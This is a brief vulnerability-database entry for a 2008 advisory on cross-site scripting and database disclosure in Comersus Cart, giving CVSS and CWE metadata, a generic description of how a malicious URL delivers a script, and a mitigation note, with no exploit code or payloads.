Vendor: Comersus Cart
By: blackbeard-sql@hotmail.fr
CVSS: 7.5 (HIGH)
XSS + remote database disclosure
CWE: 79, 200
Product Name: Comersus Cart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Comersus Cart Multiple Exploits (XSS + remote database disclosure)
In simple terms, an attacker exploits the vulnerability by sending the victim a malicious URL. The URL carries a script that is executed in the victim's browser, where it can be used to steal sensitive information from the browser or to execute malicious code on the victim's machine.
Mitigation:
The vendor should implement proper input validation and sanitization to prevent malicious scripts from being executed.